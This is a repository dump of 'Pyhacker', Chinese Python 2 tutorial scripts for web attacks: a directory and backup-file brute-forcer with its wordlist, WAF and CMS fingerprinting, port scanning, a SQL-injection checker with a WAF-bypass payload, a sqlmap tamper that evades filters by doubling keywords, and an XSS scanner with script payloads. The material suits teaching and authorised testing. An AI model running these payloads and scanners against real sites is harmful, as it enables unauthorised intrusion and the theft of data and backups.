/books/config/2.[Pyhacker]网站爬虫/Url_depth.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | import re 5 | import urllib3 6 | urllib3.disable_warnings() 7 | 8 | url_s = [] 9 | 10 | def depth(url,who): 11 | try: 12 | headers = {'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 13 | req = requests.get(url=url,headers=headers,timeout=3,verify=False) 14 | r = r'href="(.*?)"' 15 | urls = re.findall(r,req.content) 16 | for url in urls: 17 | if who in url: 18 | if url not in url_s: 19 | if 'css' not in url : 20 | url_s.append(url) 21 | except: 22 | pass 23 | 24 | def main(): 25 | url =raw_input('\nurl:') 26 | #取域名部分 27 | r = url.split('.') 28 | who = r[-2]+"."+r[-1] 29 | if 'http' not in url: 30 | url = 'http://'+url 31 | depth(url,who) 32 | print u"\n采集到了%s url"%len(url_s) 33 | 34 | while True: 35 | print u"\n开始执行深度采集" 36 | for url in url_s: 37 | if 'http' not in url: 38 | url = 'http://' + url 39 | depth(url,who) 40 | print url 41 | if len(url_s)==len(url_s): 42 | break 43 | 44 | if __name__ == '__main__': 45 | main() 46 | print u"\n采集完成" 47 | print u"\n采集到了%surl"%len(url_s) 48 | with open('Url_depth.txt','a+')as f: 49 | for url in url_s: 50 | f.write(url+"\n") 51 | print "\nSave the url_depth.txt!!!" -------------------------------------------------------------------------------- /books/config/2.[Pyhacker]网站爬虫/url_depth.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/2.[Pyhacker]网站爬虫/url_depth.gif -------------------------------------------------------------------------------- /books/config/3.[Pyhacker]后台扫描器/Dirsearch.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | import urllib3 5 | urllib3.disable_warnings() 6 | 7 | urls = [] 8 | def dirsearch(u,dir): 9 | try: 10 | headers = { 11 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 12 | #假的200页面进行处理 13 | hackxchackxchackxc = '/hackxchackxchackxc.php' 14 | hackxchackxchackxc_404 =requests.get(url=u+hackxchackxchackxc,headers=headers) 15 | # print len(hackxchackxchackxc_404.content) 16 | xxxxxxxxxxxx = '/xxxxxxxxxxxx' 17 | xxxxxxxxxxxx_404 = requests.get(url=u + xxxxxxxxxxxx, headers=headers) 18 | # print len(xxxxxxxxxxxx_404.content) 19 | 20 | #正常扫描 21 | req = requests.get(url=u+dir,headers=headers,timeout=3,verify=False) 22 | # print len(req.content) 23 | if req.status_code==200: 24 | if len(req.content)!=len(hackxchackxchackxc_404.content)and len(req.content)!= len(xxxxxxxxxxxx_404.content): 25 | print "[+]",req.url 26 | with open('success_dir.txt','a+')as f: 27 | f.write(req.url+"\n") 28 | else: 29 | print u+dir,404 30 | else: 31 | print u + dir, 404 32 | except: 33 | pass 34 | 35 | if __name__ == '__main__': 36 | url = raw_input('\nurl:') 37 | print "" 38 | if 'http' not in url: 39 | url = 'http://'+url 40 | dirpath = open('rar.txt','r') 41 | for dir in dirpath.readlines(): 42 | dir = dir.strip() 43 | dirsearch(url,dir) -------------------------------------------------------------------------------- /books/config/3.[Pyhacker]后台扫描器/dirsearch_demo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/3.[Pyhacker]后台扫描器/dirsearch_demo.gif -------------------------------------------------------------------------------- /books/config/3.[Pyhacker]后台扫描器/rar.txt: -------------------------------------------------------------------------------- 1 | /a.zip 2 | /web.zip 3 | /web.rar 4 | /1.rar 5 | /bbs.rar 6 | /www.root.rar 7 | /123.rar 8 | /data.rar 9 | /bak.rar 10 | /oa.rar 11 | /admin.rar 12 | /www.rar 13 | /2014.rar 14 | /2015.rar 15 | /2016.rar 16 | /2014.zip 17 | /2015.zip 18 | /2016.zip 19 | /2017.zip 20 | /1.zip 21 | /1.gz 22 | /1.tar.gz 23 | /2.zip 24 | /2.rar 25 | /123.rar 26 | /123.zip 27 | /a.rar 28 | /a.zip 29 | /admin.rar 30 | /back.rar 31 | /backup.rar 32 | /bak.rar 33 | /bbs.rar 34 | /bbs.zip 35 | /beifen.rar 36 | /beifen.zip 37 | /beian.rar 38 | /data.rar 39 | /data.zip 40 | /db.rar 41 | /db.zip 42 | /flashfxp.rar 43 | /flashfxp.zip 44 | /fdsa.rar 45 | /ftp.rar 46 | /gg.rar 47 | /hdocs.rar 48 | /hdocs.zip 49 | /HYTop.mdb 50 | /root.rar 51 | /Release.rar 52 | /Release.zip 53 | /sql.rar 54 | /test.rar 55 | /template.rar 56 | /template.zip 57 | /upfile.rar 58 | /vip.rar 59 | /wangzhan.rar 60 | /wangzhan.zip 61 | /web.rar 62 | /web.zip 63 | /website.rar 64 | /www.rar 65 | /www.zip 66 | /wwwroot.rar 67 | /wwwroot.zip 68 | /wz.rar 69 | /test.tar.gz 70 | /backup.sql 71 | /bak/2012-12-25.rar 72 | /bak/2012-12-25.tar.gz 73 | /bak/2012.rar 74 | /bak/2012.tar.gz 75 | /bak/htdocs.rar 76 | /bak/htdocs.tar.gz 77 | /bak/htdocs.zip 78 | /bak.sql 79 | /bak/wwwroot.rar 80 | /bak/wwwroot.tar.gz 81 | /bak/wwwroot.zip 82 | /admin.txt 83 | /admin.tar.gz 84 | /database.sql 85 | /database.tar.gz 86 | /data.sql 87 | /data.tar 88 | /data.tar.gz 89 | /db.sql 90 | /db.sql.tar 91 | /db.sql.tar.gz 92 | /db.tar 93 | /db.tar.gz 94 | /dev.tar 95 | /error_log 96 | /err_log.db 97 | /error.log 98 | /ftp.txt 99 | /htdocs.rar 100 | /htdocs.tar.gz 101 | /html.rar 102 | /html.tar.gz 103 | /html.zip 104 | /users.rar 105 | /users.sql 106 | /users.tar 107 | /users.tar.gz 108 | /user.txt 109 | /userlist.php 110 | /userlist.txt 111 | /users.txt 112 | /users.zip 113 | /userlist.tar -------------------------------------------------------------------------------- /books/config/3.[Pyhacker]后台扫描器/success_dir.txt: -------------------------------------------------------------------------------- 1 | http://127.0.0.1/users.zip 2 | -------------------------------------------------------------------------------- /books/config/4.[Pyhacker]Waf探测/Waf.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | import urllib3 5 | urllib3.disable_warnings() 6 | 7 | waf = [] 8 | 9 | def waflist(): 10 | file = open('waf.txt') 11 | for line in file: 12 | str = line.strip().split("|") #去除换行等字符,以|分割 13 | waf_data={} 14 | if len(str)==2: #判断是否属于waf格式 15 | waf_data['waf']=str[0] 16 | waf_data['name'] = str[1] 17 | waf.append(waf_data) 18 | 19 | def wafreq(u): 20 | try: 21 | headers = { 22 | 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 23 | } 24 | req = requests.get(url=u+'/and%201=1.php',headers=headers,verify=False,timeout=3) 25 | for ww in waf: 26 | if ww['waf'] in req.content: 27 | print "[+]",ww['name'],u 28 | f =open('Waf_url.txt','a+') 29 | f.write("[+]%s %s\n"%(ww['name'],u)) 30 | f.close() 31 | elif ww['waf'] in req.cookies: 32 | print "[+]",ww['name'],u 33 | f =open('Waf_url.txt','a+') 34 | f.write("[+]%s %s\n"%(ww['name'],u)) 35 | f.close() 36 | except: 37 | pass 38 | 39 | def main(): 40 | waflist() 41 | print u"\n加载waf完毕!\n" 42 | ff = open('url.txt','r') 43 | for url in ff: 44 | url = url.strip() 45 | if 'http' not in url: 46 | u = 'http://' + url 47 | wafreq(u) 48 | 49 | if __name__ == '__main__': 50 | main() 51 | -------------------------------------------------------------------------------- /books/config/4.[Pyhacker]Waf探测/Waf_url.txt: -------------------------------------------------------------------------------- 1 | [+]safedog http://www.safedog.cn 2 | [+]qianxin http://www.yunsuo.com.cn 3 | -------------------------------------------------------------------------------- /books/config/4.[Pyhacker]Waf探测/url.txt: -------------------------------------------------------------------------------- 1 | www.safedog.cn 2 | www.yunsuo.com.cn 3 | www.baidu.com -------------------------------------------------------------------------------- /books/config/4.[Pyhacker]Waf探测/waf.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/4.[Pyhacker]Waf探测/waf.gif -------------------------------------------------------------------------------- /books/config/4.[Pyhacker]Waf探测/waf.txt: -------------------------------------------------------------------------------- 1 | safedog|safedog 2 | eventID|qianxin 3 | yunsuo_session|yunsuo 4 | -------------------------------------------------------------------------------- /books/config/5.[Pyhacker]Cms识别/Cms.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | import hashlib 5 | import sys 6 | 7 | data=[] 8 | def cmslist(): 9 | file = open(r"cms.txt") 10 | for line in file: 11 | str = line.strip().split("|") 12 | ls_data={} 13 | if len(str)==3:#判断是否为正确cms格式 14 | ls_data['url']=str[0] 15 | ls_data['name'] = str[1] 16 | ls_data['md5'] = str[2] 17 | data.append(ls_data) 18 | file.close( ) 19 | 20 | def cms(url): 21 | headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0'} 22 | for cms in data: 23 | urlx = url+cms['url'] 24 | try: 25 | req = requests.get(urlx,headers=headers,timeout=2) 26 | print urlx 27 | except: 28 | pass 29 | try: 30 | if req.status_code == 200: 31 | filemd5 = hashlib.md5(req.content).hexdigest() 32 | if filemd5 == cms['md5']: 33 | print '\n[*]cms:',cms['name'] 34 | break 35 | except: 36 | pass 37 | 38 | def main(): 39 | cmslist() 40 | url =raw_input("\nurl:") 41 | if url == "": 42 | sys.exit(1) 43 | print "" 44 | if 'http' not in url: 45 | url = 'http://'+url 46 | cms(url) 47 | 48 | if __name__ == '__main__': 49 | main() 50 | -------------------------------------------------------------------------------- /books/config/5.[Pyhacker]Cms识别/cms.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/5.[Pyhacker]Cms识别/cms.gif -------------------------------------------------------------------------------- /books/config/5.[Pyhacker]Cms识别/cms.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/5.[Pyhacker]Cms识别/cms.txt -------------------------------------------------------------------------------- /books/config/6.[Pyhacker]端口扫描/Nmap.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import nmap 4 | 5 | def nmapScan(host,port): 6 | nmScan=nmap.PortScanner() 7 | state = nmScan.scan(host,port)['scan'][host]['tcp'][int(port)]['state'] 8 | print "[*] " + host + " " + port + " " + state 9 | 10 | nmapScan('127.0.0.1','80') 11 | -------------------------------------------------------------------------------- /books/config/6.[Pyhacker]端口扫描/Portscan.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import socket 4 | import ipaddr 5 | 6 | def portscan(ip,port): 7 | sockect = socket.socket() 8 | try: 9 | sockect.settimeout(0.2) 10 | sockect.connect((ip,port)) 11 | print "[+]%s open %s"%(ip,port) 12 | except: 13 | sockect.close() 14 | 15 | portlist = [21,80,443,445,3306,27017,6379] 16 | if __name__ == '__main__': 17 | ip = raw_input('\nIP:') 18 | print "" 19 | ips = ipaddr.IPNetwork(ip) 20 | for ip in ips: 21 | for port in portlist: 22 | portscan(str(ip),port) 23 | -------------------------------------------------------------------------------- /books/config/6.[Pyhacker]端口扫描/portscan.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/6.[Pyhacker]端口扫描/portscan.gif -------------------------------------------------------------------------------- /books/config/7.[Pyhacker]Sql脚本编写/Sql_judge.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/7.[Pyhacker]Sql脚本编写/Sql_judge.png -------------------------------------------------------------------------------- /books/config/7.[Pyhacker]Sql脚本编写/Sql_judge.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests 4 | import re 5 | import urllib3 6 | urllib3.disable_warnings() 7 | 8 | urls = [] 9 | def url_bypass(url): 10 | r = r'\?(.*)' 11 | id = re.findall(r,url) 12 | id = id[0] 13 | payload = "?a=/*&{}%20and%201=1%23*/".format(id) 14 | 15 | r2 = r'\?(.*)' 16 | id2 = re.findall(r2,url) 17 | id2 = id2[0] 18 | payload2 = "?a=/*&{}%20and%201=2%23*/".format(id2) 19 | 20 | urlr = '(.*)\?%s'%id 21 | url_ = re.findall(urlr,url) 22 | url_=url_[0] 23 | url_bypass = url_+payload 24 | url_bypass2 = url_ + payload2 25 | urls.append(url_bypass) 26 | urls.append(url_bypass2) 27 | 28 | def req1(url): 29 | global html1 30 | headers = { 31 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 32 | } 33 | req = requests.get(url,headers=headers,verify=False,timeout=3) 34 | html1 = req.content 35 | 36 | def req2(url): 37 | global html2 38 | headers = { 39 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 40 | } 41 | req = requests.get(url,headers=headers,verify=False,timeout=3) 42 | html2 = req.content 43 | 44 | def main(): 45 | try: 46 | req1(urls[0]) 47 | req2(urls[1]) 48 | if html1 != html2: 49 | print "[+] Find SQL",urls[1] 50 | else: 51 | pass 52 | except: 53 | pass 54 | 55 | if __name__ == '__main__': 56 | f = open('url.txt','r') 57 | for url in f: 58 | url = url.strip() 59 | url_bypass(url) # c处理url 60 | main() #判断SQL 61 | urls = [] #清空列表 -------------------------------------------------------------------------------- /books/config/7.[Pyhacker]Sql脚本编写/andand.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | 4 | #默认开头 5 | from lib.core.enums import PRIORITY 6 | __priority__ = PRIORITY.LOW #等级(LOWEST 最低级) 7 | 8 | #可有可无 9 | def dependencies(): 10 | pass 11 | 12 | 13 | def tamper(payload, **kwargs): 14 | playload = payload.replace('and','anandd') 15 | playload = playload.replace('xor', 'xoxorr') 16 | playload = playload.replace('select', 'selselectect') 17 | playload = playload.replace('union', 'uniunionon') 18 | playload = playload.replace('if', 'iiff') 19 | return playload -------------------------------------------------------------------------------- /books/config/7.[Pyhacker]Sql脚本编写/url.txt: -------------------------------------------------------------------------------- 1 | http://www.sqldog.com/Less-2/?id=1 -------------------------------------------------------------------------------- /books/config/8.[Pyhacker]Xss检测/Xss.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/8.[Pyhacker]Xss检测/Xss.gif -------------------------------------------------------------------------------- /books/config/8.[Pyhacker]Xss检测/Xss.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | #-*- coding:utf-8 -*- 3 | import requests,re,sys 4 | import urllib3 5 | urllib3.disable_warnings() 6 | 7 | def req(url,xss): 8 | headers = { 9 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 10 | } 11 | if method[0] == 'get' or 'GET': 12 | req = requests.get(url=url+"?"+name[0]+"="+xss,headers=headers,verify=False,timeout=3) 13 | print u"正在测试",url,xss 14 | if xss in req.content: 15 | print "[+]Find Get Xss url:%s payload:%s"%(url,xss) 16 | sys.exit(1) 17 | if method[0] == 'post' or 'POST': 18 | data={name[0]:xss} 19 | req = requests.post(url=url,data=data,headers=headers,verify=False,timeout=3) 20 | print u"正在测试",url,xss 21 | if xss in req.content: 22 | print "[+]Find Post Xss url:%s payload:%s"%(url,xss) 23 | sys.exit(1) 24 | 25 | def html(url): 26 | global method,name 27 | headers = { 28 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 29 | } 30 | req = requests.get(url,headers=headers,verify=False,timeout=3) 31 | r =r'' 32 | form = re.findall(r,req.content,re.S) 33 | method=re.findall(r'method="(.*?)"',str(form)) 34 | name = re.findall(r'name="(.*?)"', str(form)) 35 | try: 36 | if method==None or name==None: 37 | sys.exit(0) 38 | else: 39 | print u"\nFind method = %s name = %s\n"%(method[0],name[0]) 40 | except: 41 | print u"\n自动分析失败!" 42 | sys.exit(0) 43 | 44 | 45 | if __name__ == '__main__': 46 | url = raw_input('\nurl:') 47 | if 'http' not in url: 48 | url = 'http://'+url 49 | xss = ["", 50 | "%3Cscript%3Ealert('XSS')%3C/script%3E", 51 | '">ript>alert(/xss/)', 52 | "" 53 | ] 54 | 55 | html(url) 56 | for x in xss: 57 | req(url,x) -------------------------------------------------------------------------------- /books/config/9.[Pyhacker]调用第三方接口/Lookup.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests,re 4 | 5 | def demo(url): 6 | headers = { 7 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 8 | } 9 | url = 'https://api.hackertarget.com/reverseiplookup/?q=%s'%url 10 | req = requests.get(url,headers=headers) 11 | html = req.content 12 | print html 13 | 14 | if __name__ == '__main__': 15 | url = raw_input("\nurl:") 16 | print u"正在查询,请稍后...\n" 17 | demo(url) -------------------------------------------------------------------------------- /books/config/9.[Pyhacker]调用第三方接口/qq.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | # -*- coding:utf-8 -*- 3 | import requests,re 4 | 5 | def demo(qq): 6 | headers = { 7 | 'User-Agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0' 8 | } 9 | url = 'https://api.oioweb.cn/api/Membereq.php?qq=%s'%qq 10 | req = requests.get(url,headers=headers) 11 | html = req.json() 12 | print u"开通业务如下:" 13 | for x in html['data']['name']: 14 | print x 15 | 16 | if __name__ == '__main__': 17 | url = raw_input("\nQQ:") 18 | print u"正在查询,请稍后...\n" 19 | demo(url) -------------------------------------------------------------------------------- /books/config/9.[Pyhacker]调用第三方接口/第三方.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/config/9.[Pyhacker]调用第三方接口/第三方.gif -------------------------------------------------------------------------------- /books/img/1/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/1.png -------------------------------------------------------------------------------- /books/img/1/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/10.png -------------------------------------------------------------------------------- /books/img/1/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/2.png -------------------------------------------------------------------------------- /books/img/1/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/3.png -------------------------------------------------------------------------------- /books/img/1/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/4.png -------------------------------------------------------------------------------- /books/img/1/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/5.png -------------------------------------------------------------------------------- /books/img/1/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/6.png -------------------------------------------------------------------------------- /books/img/1/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/7.png -------------------------------------------------------------------------------- /books/img/1/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/8.png -------------------------------------------------------------------------------- /books/img/1/9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/1/9.png -------------------------------------------------------------------------------- /books/img/10/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/10/1.png -------------------------------------------------------------------------------- /books/img/10/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/10/2.png -------------------------------------------------------------------------------- /books/img/10/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/10/3.png -------------------------------------------------------------------------------- /books/img/11/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/11/1.png -------------------------------------------------------------------------------- /books/img/11/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/11/2.png -------------------------------------------------------------------------------- /books/img/11/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/11/3.png -------------------------------------------------------------------------------- /books/img/11/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/11/4.png -------------------------------------------------------------------------------- /books/img/11/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/11/5.png -------------------------------------------------------------------------------- /books/img/11/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/11/6.png -------------------------------------------------------------------------------- /books/img/12/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/12/1.png -------------------------------------------------------------------------------- /books/img/12/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/12/2.png -------------------------------------------------------------------------------- /books/img/12/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/12/3.png -------------------------------------------------------------------------------- /books/img/12/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/12/4.png -------------------------------------------------------------------------------- /books/img/12/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/12/5.png -------------------------------------------------------------------------------- /books/img/12/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/12/6.png -------------------------------------------------------------------------------- /books/img/13/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/13/1.png -------------------------------------------------------------------------------- /books/img/14/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/1.png -------------------------------------------------------------------------------- /books/img/14/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/10.png -------------------------------------------------------------------------------- /books/img/14/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/11.png -------------------------------------------------------------------------------- /books/img/14/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/12.png -------------------------------------------------------------------------------- /books/img/14/13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/13.png -------------------------------------------------------------------------------- /books/img/14/2.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/2.png -------------------------------------------------------------------------------- /books/img/14/3.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/3.png -------------------------------------------------------------------------------- /books/img/14/4.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/4.png -------------------------------------------------------------------------------- /books/img/14/5.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/5.png -------------------------------------------------------------------------------- /books/img/14/6.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/6.png -------------------------------------------------------------------------------- /books/img/14/7.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/7.png -------------------------------------------------------------------------------- /books/img/14/8.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/8.png -------------------------------------------------------------------------------- /books/img/14/9.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/14/9.png -------------------------------------------------------------------------------- /books/img/15/1.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/1.png -------------------------------------------------------------------------------- /books/img/15/10.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/10.png -------------------------------------------------------------------------------- /books/img/15/11.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/11.png -------------------------------------------------------------------------------- /books/img/15/12.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/12.png -------------------------------------------------------------------------------- /books/img/15/13.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/13.png -------------------------------------------------------------------------------- /books/img/15/14.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/14.png -------------------------------------------------------------------------------- /books/img/15/15.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/15.png -------------------------------------------------------------------------------- /books/img/15/16.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/hackxc/Pyhacker/e147ef3cb8c27f2448bcf7f0ad67b8a5230fe338/books/img/15/16.png -------------------------------------------------------------------------------- /books/img/15/17.png: -------------------------------------------------------------------------------- 